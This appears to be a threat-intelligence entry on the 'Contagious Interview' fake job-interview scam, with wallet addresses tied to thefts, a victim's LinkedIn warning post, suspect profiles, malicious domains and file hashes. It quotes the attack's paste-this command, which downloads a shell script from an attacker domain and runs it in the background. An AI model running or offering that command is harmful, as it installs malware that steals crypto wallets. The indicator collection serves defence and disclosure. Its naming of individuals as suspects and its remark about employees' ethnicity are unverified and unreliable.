Date:: December 12th, 2024
Amount Stolen:: $64,020
Tags:: 🎙️ Contagious Interview
curl -k -o /var/tmp/ffmpeg.sh https://api.nvidia-release.org/ffmpeg-ja.sh && chmod +x /var/tmp/ffmpeg.sh && nohup bash /var/tmp/ffmpeg.sh >/dev/null 2>&1 &
Please follow this link to complete the interview:
-
https://willointerview.com/invite/halliday -
BCPKcYy6GQFVMLpdFq8iLwYjHE4GEXvwM1jCpUrg6mU4 - Theft from Victim 1, SOL
-
0x66fe228806e3ce9fd06c8dbb9698014e8dc6ae56 - Theft from Victim 1, ETH BASE
-
0x2ecf64c21bba725a0ea4389a5c63b203806c84f5 - Theft from Victim 1, BSC
-
0x2ecf64c21bba725a0ea4389a5c63b203806c84f5 - Theft from Victim 1, BSC MEXC
-
0x2014f057ee83c419fa192ea4e7da0a1cfd7acc2b - Theft from Victim 1, BSC MEXC
-
0x8a1fb46e20842692abc960aedc93e4cb204487c3 - Theft from Victim 1, BSC MEXC
-
GKYdVvus5SrsyrEKv9fJJ8FgttW9X1LY8iDqpcevH4yz - Theft from Victim 1, SOL OKX
-
0x4bfc7f21807ec10e5c07941fedfa400b735c8fdb - Theft from Victim 1, BASE ChangeNOW
- 0xf5a46FF0d81Aef7972Cb5f28243541CFF6D6fEb3 - Victim 2
- 0x0b4eCF28692614C10Deb7d8579F4878Be3Fd2DE9 - Victim 2
- H13Z8gS2QXzYV6s7CDXHsNd3YJr9Mp5jSi9THAYAzthb - Victim 2
- CFGUeyEFusERXKxNoXz3KhKku5tBKcBRSuGHQ7o8toG3 - Victim 2
- Fu9YWHCTX5pw1furkAXoceGje7GbFiV5Cik8WmhbRX5N - Victim 2
- ynpQ7Rwa4o6DifA699ojVmMKq5J3r642KwBqMUX2LZq - Victim 2
- 7Mgi54ZagHM5oQY1ymJBMneHznsT3cy8PXJNNx7SwDe3 - Victim 2
- 0x03598ca1d28d6254aca2b734e5b8edac54bb5ac9 - Theft from Victim 2
- Linkedin / Kraken impersonation
- 8s625QRcb8q349p1evDsyzYJ7Npwkh9KfHY1s3XSztVF - Theft from Victim 3
- 0xbd848d23d3fce0acef833dfe43b6cb6e23d8f5c2 - Theft from Victim 3
THEY TRIED TO SCAM ME ON LINKEDIN WITH A PHISHING ATTEMPT that would have surely emptied my Wallets. Don't be fooled by supposed job offers that are too good to be true 👇🏻
How to identify these social engineering scam methods?
What the scammer didn't know is that I noticed it from the beginning, because:
- The company does not exist.
- Your HR profile is not validated by anyone.
- The company's supposed website is under maintenance.
- They are in a hurry to hire because it is already December and the year is ending.
- The description of the offer is clearly made with ChatGPT and their response when I shared my supposed CV was super mechanical.
- Instead of providing a link to Zoom or Teams, he sends me a link to a platform that absolutely no one knows about.
- The company description sells it as tech but then looking for the supposed employees (with African features, and don't misunderstand this) Several people appear who say they work there but say it is a security company.
Anyway, always do your research, don't open any suspicious links and never download any files or programs.
-
https://urlscan.io/search/#hash%3A6b7038bab8c410aeb6714e1d98d609a61b6dc3e418a6b5c74a17f2d6d6cb4aaf
-
https://www.virustotal.com/gui/ip-address/162.254.39.9/relations
- Laura Rotta - https://www.linkedin.com/in/laura-r-480309340/
- Daniel Joseph Holyhead - https://www.linkedin.com/in/daniel-joseph-holyhead-a3011733a
- Marianne Totterdell
- Trevor Greer trevorgreer9312@gmail.com https://github.com/trevor9312 104.223.97.2 (Astrill), 91.239.130.102 (Astrill)
-
app.crypto-assessment/invite/cryptoTrader -
willointerview.com/invite/halliday -
willoassess.net/invite/Aweras -
web.videoscreening.org/invite/netherminddefi -
willointerview.com/invite/tforce -
216.74.123.191:22 -
216.74.123.191:3001 -
216.74.123.191:8080 -
api.camera-drive.cloud -
api.jz-aws.info -
api.nvidia-drive.cloud -
nvidia-release.org -
nvidia-release.us -
api.nvidia-release.org/ffmpeg-ar.sh -
api.nvidia-release.org -
api.nvidia-release.us -
app.crypto-assessment.com -
app.hiringinterview.org -
app.hiringtalent.pro -
app.interviewnest.org -
app.videoscreening.org -
app.willo-interview.us -
app.willoassess.com -
api.willoassessment.com -
app.willoassessment.com -
app.willocandidate.com -
app.willohiring.com -
app.willohiringtalent.org -
app.willomexcvip.us -
app.willorecruit.com -
app.willotalant.com -
app.willotalent.pro -
app.willotalent.us -
app.willotalent.xyz -
app.willotalentes.com -
app.willotalents.org -
app.wtalents.us -
blockchain-assess.com -
app.blockchain-assess.com -
vid.blockchain-assess.com -
camera-drive.cloud -
consensys.willoassessment.com -
cpanel.wtalents.us -
crypto-assessment.com -
d12rlkj8v5mwse.cloudfront.net -
d1yzmjg018adwf.cloudfront.net -
d20zx0lguyxj2p.cloudfront.net -
d3o9p0hkd7eul5.cloudfront.net -
dal-shared-22.hostwindsdns.com -
dal-shared-25.hostwindsdns.com -
dal-shared-37.hostwindsdns.com -
final.hiringtalent.pro -
fundcandidates.com -
gemini.crypto-assessment.com -
gemini.willoassess.com -
gemini.willohiring.com -
gemini.willohiringtalent.org -
geminiskill.willoassessment.com -
hiring.willoassessment.com -
hiringinterview.org -
hiringtalent.pro -
hyphen-connect.com -
interviewnest.org -
jz-aws.info -
mail.willomexcvip.us -
mail.wtalents.us -
sea-shared-10.hostwindsdns.com -
talent.willo-interview.us -
talentcompetency.com -
vid.willoassess.com -
videoscreening.org -
web.videoscreening.org -
werhiring.willomexcvip.us -
wiilotalent.com -
wilio-talent.net -
willo-interview.us -
willo-video.com -
willoassess.com -
willoassess.net -
willoassess.org -
willoassessment.com -
willocandidate.com -
willohire.com -
willohiring.com -
willohiringtalent.org -
willointerview.com -
willomexcvip.us -
willorecruit.com -
willotalant.com -
willotalent.pro -
willotalent.us -
willotalent.xyz -
willotalentes.com -
willotalents.org -
wtalents.us
logdd05f805d172583f1436eac2cfddcc5413ef6be0b37eda98ebca0cb0cfae8ad9efile.zip96e78074218a0f272f7f94805cabde1ef8d64ffbnodejs.zip86dea05a8f40cf3195e3a6056f2e968c861ed8f1ffmpeg.sha803c043e12a5dac467fae092b75aa08b461b8e9dd4c769cea375ff87287a361ffmpeg.shc6472eb993612db72ca50893a34137ba11173e60a1a4c028d4660a3f755d2490nvidia-real.zipnvidiaupdate.zip-e52118fc7fc9b14e5a8d9f61dfae8b140488ae6ec6f01f41d9e16782febad5f2VCam_arm64.zip-3405469811bae511e62cb0a4062aadb523cad263VCam_intel.zip-60ec2dbe8cfacdff1d4eb093032b0307e52cc68feb1f67487d9f401017c3edd7
